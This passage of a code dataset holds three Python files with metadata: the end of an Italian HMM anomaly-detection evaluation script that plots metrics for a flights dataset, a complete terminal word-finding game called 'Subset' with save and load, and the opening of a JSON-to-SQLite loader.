anomalo?\n if Y[i+(w-1)] == True:\n tp += 1\n else:\n fp += 1\n if s < thresh: # valore nominale?\n if Y[i+(w-1)] == False: \n tn += 1\n else:\n fn += 1\n '''\n print('Precision:', tp/(tp+fp))\n print('Recall:', tp/(tp+fn))\n print('F1 score', tp / (tp + 1/2 * (fp+fn)))\n print('Accuracy', (tp+tn) / ((tp+fn)+(fp+tn)))\n print('TPR', tp / (tp+fn))\n print('FPR', fp / (fp+tn))\n '''\n prec = tp/(tp+fp)\n rec = tp/(tp+fn)\n f1 = tp / (tp + 1/2 * (fp+fn))\n acc = (tp+tn) / ((tp+fn)+(fp+tn))\n tpr = tp / (tp+fn)\n fpr = fp / (fp+tn)\n \n precs.append(prec)\n recs.append(rec)\n f1s.append(f1)\n accs.append(acc)\n tprs.append(tpr)\n fprs.append(fpr)\n\n# https://en.wikipedia.org/wiki/Precision_and_recall#Definition_(classification_context)\nplt.figure(dpi=125)\nplt.plot(thresholds, precs)\nplt.title(\"Grafico di precision (dataset voli)\")\nplt.xlabel(\"Threshold\")\nplt.ylabel(\"Precision\")\nplt.show()\n\nplt.figure(dpi=125)\nplt.plot(thresholds, recs)\nplt.title(\"Grafico di recall (dataset voli)\")\nplt.xlabel(\"Threshold\")\nplt.ylabel(\"Recall\")\nplt.show()\n\n# https://en.wikipedia.org/wiki/F-score#Definition\nplt.figure(dpi=125)\nplt.plot(thresholds, f1s)\nplt.title(\"Grafico di F1 score (dataset voli)\")\nplt.xlabel(\"Threshold\")\nplt.ylabel(\"F1 score\")\nplt.show()\n\n# https://it.wikipedia.org/wiki/Receiver_operating_characteristic\nplt.figure(dpi=125)\nplt.plot(thresholds, accs)\nplt.title(\"Grafico di accuracy (dataset voli)\")\nplt.xlabel(\"Threshold\")\nplt.ylabel(\"Accuracy\")\nplt.show()\n\nplt.figure(dpi=125)\nplt.plot(thresholds, tprs)\nplt.title(\"Grafico del True Positive Rate (dataset voli)\")\nplt.xlabel(\"Threshold\")\nplt.ylabel(\"TPR\")\nplt.show()\n\nplt.figure(dpi=125)\nplt.plot(thresholds, fprs)\nplt.title(\"Grafico del False Positive Rate (dataset voli)\")\nplt.xlabel(\"Threshold\")\nplt.ylabel(\"FPR\")\nplt.show()\n\n# https://scikit-learn.org/stable/modules/generated/sklearn.metrics.roc_curve.html\nfpr, tpr, t = roc_curve(Y[(w-1):], anomaly_scores)\nAUC = integrate.trapz(tpr, fpr)\n\nplt.figure(dpi=125)\nplt.plot(fpr, tpr)\nplt.title(\"Curva ROC (dataset voli) - AUC = {area:.4f}\".format(area=AUC))\nplt.xlabel(\"FPR\")\nplt.ylabel(\"TPR\")\nplt.show()\n\nprint(\"AUC (metodo integrazione trapezoidale):\", AUC)\n", "repo_name": "zampierida98/anomaly-detection", "sub_path": "hmm_hellinger_voli.py", "file_name": "hmm_hellinger_voli.py", "file_ext": "py", "file_size_in_byte": 8822, "program_lang": "python", 
"lang": "it", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 15, "usage_type": "call"}, {"api_name": "scipy.linalg.det", "line_number": 21, "usage_type": "call"}, {"api_name": "scipy.linalg", "line_number": 21, "usage_type": "name"}, {"api_name": "scipy.linalg.det", "line_number": 22, "usage_type": "call"}, {"api_name": "scipy.linalg", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.linalg.matrix_power", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 24, "usage_type": "attribute"}, {"api_name": "scipy.stats.mode", "line_number": 45, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.reshape", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.cov", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 73, "usage_type": "call"}, {"api_name": "hmmlearn.hmm.GaussianHMM", "line_number": 87, "usage_type": "call"}, {"api_name": "hmmlearn.hmm", "line_number": 87, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 119, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.s_", "line_number": 123, "usage_type": "attribute"}, {"api_name": "hmmlearn.hmm.GaussianHMM", "line_number": 152, "usage_type": "call"}, {"api_name": "hmmlearn.hmm", "line_number": 152, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_curve", "line_number": 166, "usage_type": "call"}, {"api_name": "scipy.integrate.trapz", "line_number": 167, "usage_type": "call"}, {"api_name": "scipy.integrate", "line_number": 167, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 180, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.fill_between", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": 
"numpy.arange", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 237, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 237, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 238, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 238, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 239, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 240, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 240, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 241, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 241, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 242, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 242, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 244, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 244, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 245, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 245, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 246, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 246, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 247, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 247, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 248, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 248, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 249, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 249, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 252, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 252, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 253, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 254, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 254, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 255, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 255, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 256, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 256, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 257, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 257, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 260, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 261, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 262, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 262, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 
263, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 264, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 264, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 265, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 265, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 267, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 268, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 269, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 269, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 270, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 270, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 271, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 272, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 272, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 274, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 274, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 275, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 275, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 276, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 276, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 277, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 277, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 278, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 278, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_curve", "line_number": 282, "usage_type": "call"}, {"api_name": "scipy.integrate.trapz", "line_number": 283, "usage_type": "call"}, {"api_name": "scipy.integrate", "line_number": 283, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 285, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 285, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 286, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 286, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 287, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 287, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 288, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 289, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 289, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 290, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 290, "usage_type": "name"}]} +{"seq_id": "8646643052", "text": "#!/usr/bin/env python3\n\nimport 
random\nimport re\nimport math\nimport os\nimport time\nimport sys\nimport textwrap\nimport shutil\nfrom pathlib import Path\n\nimport colorama\n\n\n# Style globals\nRED = \"\\033[31m\"\nYELLOW = \"\\033[33m\"\nGREEN = \"\\033[32m\"\nCYAN = \"\\033[36m\"\nBOLD = \"\\033[1m\"\nDEFAULT = \"\\033[0m\"\n\n# Display globals\nWIDTH = shutil.get_terminal_size().columns # Falls back to 80\nMID_WIDTH = 35\n\n# Filesystem globals\nROOT = os.path.dirname(os.path.abspath(__file__)) \nLOCAL = os.path.join(str(Path.home()), \".subset\")\n\n# For the specific game\nSEED = round(time.time())\n\n\ndef main():\n global WIDTH\n global SEED\n\n # On Windows, this allows use of ANSI escape sequences\n colorama.init()\n\n # Ensure local directory exists\n if not os.path.exists(LOCAL):\n os.makedirs(LOCAL)\n\n # Load dictionary, this should remove proper nouns and non-alpha words\n with open(os.path.join(ROOT, \"dictionary.txt\"), encoding=\"ISO-8859-1\") as f:\n dictionary = [line.strip() for line in f.readlines() if \n set(\"-_'.?!():;#\\\"1234567890\").isdisjoint(set(line)) and\n not line[0].isupper()]\n\n\n # Check for a savefile and load it. This works by setting the random seed\n # and loading all found words. Setup welcome messages\n try:\n # Savefile structure is:\n # #seed\n # {the seed}\n # #found\n # {line}\n # {dilineated}\n # {words}\n #\n # This format is cool because you can just iterate over it using a state\n # machine where any state can transition to any other state\n\n with open(os.path.join(LOCAL, \"savefile.txt\")) as f:\n found = []\n state = \"\"\n for line in f.readlines():\n if line[0] == \"#\":\n state = line[1:].strip()\n elif state == \"seed\":\n SEED = int(line.strip())\n elif state == \"found\":\n if line.strip() != \"\":\n found.append(line.strip())\n print_banner()\n message = f\"{CYAN}Found save file{DEFAULT}\"\n except FileNotFoundError:\n # SEED is already set\n found = [] \n message = f\"{BOLD}Welcome to Subset!{DEFAULT} {CYAN}Started a new game{DEFAULT}\"\n\n\n # Seed it with either the default unixtime, or the seed loaded from the file\n random.seed(SEED)\n\n # In case it ever comes up, only use operations when restoring state from\n # SEED that have a defined and guaranteed order. Earlier I used letters =\n # list(set(pangram)), then used random.choice(letters). This broke because set\n # does not have a consistent order when converting to a list\n\n # First make a list of any possible pangram, then pick one\n possible_pangrams = [word for word in dictionary if len(set(word)) == 7]\n pangram = random.choice(possible_pangrams)\n\n # Pick a special letter, and make a persistent ordered list of the others\n letters = list(set(pangram))\n letters.sort()\n special_letter = random.choice(letters)\n ring_letters = [letter.upper() for letter in letters if not letter is\n special_letter]\n random.shuffle(ring_letters)\n\n # Make a list of all valid words. 
The dictionary never needs to be touched\n # again after this\n valid_words = [word for word in dictionary if\n set(word).issubset(set(letters)) and \n len(word) >= 4 and\n special_letter in word]\n\n # Quickly find other pangrams that share letters with the starting one\n # (there usually are a few)\n pangrams = [word for word in valid_words if len(set(word)) == 7]\n\n\n # Compute both total possible score and score so far (nonzero when loading\n # from a save)\n total_score = sum([score_word(word) for word in valid_words])\n score = sum([score_word(word) for word in found])\n\n while True:\n # Refresh size every loop\n WIDTH = shutil.get_terminal_size().columns\n clear()\n print_banner()\n\n # Render game stats to the right of the logo\n score_color = color_score(score, total_score)\n # Save the cursor, not necessary, but nice because we're going to jump\n # back into the logo lines and print score, words, and total pangrams\n print(\"\\033[s\")\n print(f\"\\033[3;{WIDTH-16}H\", end=\"\")\n print(align(f\"Score: {score_color}{score}{DEFAULT}/{GREEN}{total_score}{DEFAULT}\", 16, \"r\")) \n print(f\"\\033[4;{WIDTH-16}H\", end=\"\")\n print(align(f\"Words: {score_color}{len(found)}{DEFAULT}/{GREEN}{len(valid_words)}{DEFAULT}\", 16, \"r\"))\n print(f\"\\033[5;{WIDTH-16}H\", end=\"\")\n print(align(f\"{YELLOW}{pluralize(len(pangrams), 'Pangram')}{DEFAULT}\", 16, \"r\"))\n # Restore the cursor (to one line below the banner separator (===))\n print(\"\\033[u\")\n\n # Print a hexagon of letters, with the common letter in the centre\n print(align(f\" {ring_letters[0]} {ring_letters[1]} \", WIDTH, \"c\"))\n print(align(f\"{ring_letters[2]} {YELLOW}{special_letter.upper()}{DEFAULT} {ring_letters[3]}\", WIDTH, \"c\"))\n print(align(f\" {ring_letters[4]} {ring_letters[5]} \", WIDTH, \"c\"))\n\n # Print out the status message (often the result of last command or\n # guess). Clear it immediately (so just pressing enter can banish it)\n print(message)\n message = \"\"\n\n # Collect input in yellow\n print(f\"Type word or {BOLD}h{DEFAULT} for help\")\n guess = input(f\"> {YELLOW}\").strip().lower()\n print(DEFAULT, end=\"\")\n\n # All options should clear the screen (though all should redraw the\n # banner too\n\n WIDTH = shutil.get_terminal_size().columns\n clear()\n\n # Ignore empty input\n if guess == \"\":\n continue\n\n # About game text, rules/sources\n elif guess == \"a\":\n print_about()\n pause()\n\n # Save and exit. This is different from quit because quit shows you your\n # score and deletes your save file\n elif guess == \"e\":\n print_saveandexit(found)\n\n # Help text\n elif guess == \"h\":\n print_help()\n pause()\n\n # List words out\n elif guess == \"l\":\n print_foundlist(found, valid_words, score, total_score) \n pause()\n\n # Randomize the non-common letter positions\n elif guess == \"s\":\n random.shuffle(ring_letters)\n message = f\"{CYAN}Shuffled{DEFAULT}\"\n\n # Abandon game. This isn't a function because it does a lot of stuff\n elif guess == \"q\":\n print_quit(found, valid_words, score, total_score) \n\n # Tell user when they already used a word\n elif guess in found:\n message = f\"{YELLOW}Already played {guess}{DEFAULT}\"\n\n # Anything else must be an untried guess\n else:\n if guess in valid_words:\n # Duplicating the scoring code because we're checking for\n # pangrams too\n if len(guess) == 4:\n d_score = 1\n else:\n d_score = len(guess)\n if len(set(guess)) == 7:\n d_score = d_score + 14\n message = f\"{GREEN}Pangram found! 
+{pluralize(d_score, 'point')}{DEFAULT}\"\n else:\n message = f\"{GREEN}Correct! +{pluralize(d_score, 'point')}{DEFAULT}\"\n score = score + d_score\n found.append(guess)\n\n # An invalid word was inputted. Find out why\n else:\n # May use letters, but missing the common one\n if not special_letter in guess:\n message = f\"{RED}'{guess.title()}' does not contain {YELLOW}{special_letter.upper()}{DEFAULT}\"\n # If it is a dictionary word, it must use bad letters\n elif guess in dictionary:\n message = f\"{RED}'{guess.title()}' uses other letters{DEFAULT}\"\n # Anything else means the dictionary doesn't have it\n else:\n message = f\"{RED}'{guess.title()}' is not in dictionary{DEFAULT}\"\n print() \n\ndef print_banner():\n if WIDTH > 70:\n alignment = \"c\"\n elif WIDTH > 50:\n alignment = \"l\"\n else:\n print(f\"\\n\\n\\n\\n{YELLOW}Subset{DEFAULT}\\n\"+\"=\"*WIDTH+\"\\n\")\n return\n\n print(YELLOW, end=\"\")\n print(align(\" _____ __ __ \", WIDTH, alignment))\n print(align(\" / ___/__ __/ /_ ________ / /_\", WIDTH, alignment))\n print(align(\" \\\\__ \\\\/ / / / __ \\\\/ ___/ _ \\\\/ __/\", WIDTH, alignment))\n print(align(\" ___/ / /_/ / /_/ (__ ) __/ /_ \", WIDTH, alignment))\n print(align(\"/____/\\\\__,_/_.___/____/\\\\___/\\\\__/ \", WIDTH, alignment))\n print(DEFAULT, end=\"\")\n print()\n print(\"=\"*WIDTH)\n print()\n\n\ndef print_foundlist(found, valid_words, score, total_score):\n score_color = color_score(score, total_score)\n print_banner()\n print(f\"Found {score_color}{len(found)}{DEFAULT}/{GREEN}{len(valid_words)}{DEFAULT} words:\")\n longest = 0\n for word in found:\n if len(word) > longest:\n longest = len(word)\n\n col_width = longest + 1\n columns = math.floor(WIDTH/col_width)\n for i in range(0, len(found)):\n ending = \"\"\n if (i+1) % columns == 0:\n ending = \"\\n\"\n if len(set(remove_ansi(found[i]))) == 7:\n print(align(f\" {YELLOW}*{DEFAULT}{found[i]}\", col_width, \"l\"), end=ending)\n else:\n print(align(f\" {found[i]}\", col_width, \"l\"), end=ending)\n print()\n\ndef print_help():\n print_banner()\n print(align(\"Commands\", WIDTH, \"c\"))\n print(align(\"-\"*MID_WIDTH, WIDTH, \"c\"))\n print(align(align(\"a About this game\", MID_WIDTH, \"l\"), WIDTH, \"c\"))\n print(align(align(\"e Save and exit\", MID_WIDTH, \"l\"), WIDTH, \"c\"))\n print(align(align(\"h Help (this text)\", MID_WIDTH, \"l\"), WIDTH, \"c\"))\n print(align(align(\"l List found words\", MID_WIDTH, \"l\"), WIDTH, \"c\"))\n print(align(align(\"q Quit and show words\", MID_WIDTH, \"l\"), WIDTH, \"c\"))\n print(align(align(\"s Shuffle letters\", MID_WIDTH, \"l\"), WIDTH, \"c\"))\n print()\n\ndef print_about():\n print_banner()\n print(align(\"About Subset\", WIDTH, \"c\"))\n print( align(\"----------------------------------\", WIDTH, \"c\"))\n print(align(align(f\"{YELLOW}Subset{DEFAULT} is a word-finding game.\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"Every game, you are presented\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"with seven letters, the goal is\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"to make as many words as you can\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"using those letters. You may use\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"the same letter more than once\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"in a word. You MUST use the center\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"letter in every word. Longer words\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"are worth more points. 
Words that\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"use all seven letters are called\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"'pangrams' and are worth extra\", 35, \"l\"), WIDTH, \"c\"))\n print(align(align(\"points as well.\", 35, \"l\"), WIDTH, \"c\"))\n print()\n print(align(f\"The dictionary is taken from the excellent SCOWL project.\", WIDTH, \"c\"))\n print(align(f\"See {ROOT}/DICTIONARY_LICENSE.txt for license information.\", WIDTH, \"c\"))\n print()\n print(align(f\"{YELLOW}Subset{DEFAULT} is open source and available at:\", WIDTH, \"c\"))\n print(align(f\"{CYAN}https://github.com/rightbrace/subset-game.git{DEFAULT}\", WIDTH, \"c\"))\n print()\n\n\ndef print_quit(found, valid_words, score, total_score):\n print_banner()\n\n # Double check with the player\n choice = input(align(\"Really end this game and see results? (y/n) \", WIDTH, \"c\", end=False))\n if choice.lower() != \"y\":\n return\n\n clear()\n print_banner()\n\n # Resummarize results in middle of page\n score_color = color_score(score, total_score)\n print(align(f\"Final score: {score_color}{score}{DEFAULT}/{GREEN}{total_score}{DEFAULT}\", WIDTH, \"c\"))\n print(align(f\"Found {score_color}{len(found)}{DEFAULT}/{GREEN}{len(valid_words)}{DEFAULT} words\", WIDTH, \"c\"))\n\n # Print the words in column, wound words in green and asterecies next to pangrams\n print_words = input(align(\"Print words? (y/n) \", WIDTH, \"c\", end=False))\n if print_words.lower() == \"y\":\n # Colour words that were found and find the maximum sized word\n to_print = []\n longest = 0\n for word in valid_words:\n if word in found:\n out = f\"{GREEN}{word}{DEFAULT}\"\n else:\n out = word\n to_print.append(out)\n if len(word) > longest:\n longest = len(word)\n \n # Work out how many columns can fit\n col_width = longest + 2\n columns = math.floor(WIDTH/col_width)\n\n # Spacer\n print()\n print(\"=\"*WIDTH)\n\n # Print words from list (they've been colored, but not starred), placing\n # newlines when appropriate\n for i in range(0, len(to_print)):\n ending = \"\"\n if (i+1) % columns == 0:\n ending = \"\\n\"\n if len(set(remove_ansi(to_print[i]))) == 7:\n print(align(f\" {YELLOW}*{DEFAULT}{to_print[i]}\", col_width, \"l\"), end=ending)\n else:\n print(align(f\" {to_print[i]}\", col_width, \"l\"), end=ending)\n\n print()\n print(\"=\"*WIDTH)\n print(align(f\"Pangrams are marked with {YELLOW}*{DEFAULT}\", WIDTH, \"r\"))\n print()\n\n # Delete savefile\n try:\n os.remove(os.path.join(LOCAL, \"savefile.txt\"))\n except FileNotFoundError:\n pass\n\n # Give user a bit of feedback before exiting\n pause()\n sys.exit()\n\n\ndef print_saveandexit(found):\n print_banner()\n really = input(align(\"Really save and exit? 
(y/n) \", WIDTH, \"c\", end=False))\n\n # Anything other than a y should return the user to safety\n if really[0].lower() != \"y\":\n return\n\n save_game(found)\n clear()\n print_banner()\n print(align(\"Game saved!\", WIDTH, \"c\"))\n print()\n pause()\n sys.exit()\n\n# Some utilities:\ndef clear():\n print(\"\\033c\", end=\"\")\n\ndef remove_ansi(string):\n return re.sub(\"\\033\\[\\d+m\", \"\", string)\n\ndef align(string, width, just, end=True):\n strlen = len(remove_ansi(string))\n if just == \"l\":\n if end:\n return string + \" \"*(width-strlen)\n else:\n return string\n elif just == \"r\":\n return \" \"*(width-strlen) + string\n elif just == \"c\":\n if end:\n return \" \"*math.ceil((width-strlen)/2) + string + \" \"*math.floor((width-strlen)/2)\n else:\n return \" \"*math.ceil((width-strlen)/2) + string\n\ndef pluralize(count, string, plural=\"\"):\n if count == 1:\n return f\"1 {string}\"\n else:\n if plural ==\"\":\n return f\"{count} {string}s\"\n else:\n return f\"{count} {plural}\"\n\ndef color_score(score, total_score):\n ratio = score / total_score\n if ratio < 0.33:\n score_color = RED\n elif ratio < 0.66:\n score_color = YELLOW\n else:\n score_color = GREEN\n return score_color\n\ndef score_word(word):\n score = 0\n if len(word) == 4:\n score = score + 1\n else:\n score = score + len(word)\n if len(set(word)) == 7:\n score = score + 14\n return score \n\ndef pause():\n input(align(align(\"[Press Enter]\", MID_WIDTH, \"l\", end=False), WIDTH, \"c\", end=False))\n\ndef save_game(found):\n with open(os.path.join(LOCAL, \"savefile.txt\"), \"w\") as f:\n f.write(\"#seed\\n\")\n f.write(str(SEED) + \"\\n\")\n f.write(\"#found\\n\")\n for word in found:\n f.write(word + \"\\n\")\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "rightbrace/subset-game", "sub_path": "subset/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 15946, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "shutil.get_terminal_size", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pathlib.Path.home", "line_number": 30, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 30, "usage_type": "name"}, {"api_name": "time.time", "line_number": 33, "usage_type": "call"}, {"api_name": "colorama.init", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 88, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 97, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 102, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 105, "usage_type": "call"}, {"api_name": 
"shutil.get_terminal_size", "line_number": 126, "usage_type": "call"}, {"api_name": "shutil.get_terminal_size", "line_number": 162, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 191, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 263, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 344, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 368, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 368, "usage_type": "call"}, {"api_name": "os.path", "line_number": 368, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 374, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 391, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 398, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 411, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 411, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 413, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 448, "usage_type": "call"}, {"api_name": "os.path", "line_number": 448, "usage_type": "attribute"}]} +{"seq_id": "40882750321", "text": "import os, json\nimport pandas as pd\nfrom datetime import datetime\nimport sqlite3 \npath_to_json = '../project_NLP/bin/JSON_DATAS/'\njson_files = [pos_json for pos_json in os.listdir(path_to_json) if pos_json.endswith('.json')]\nconn = 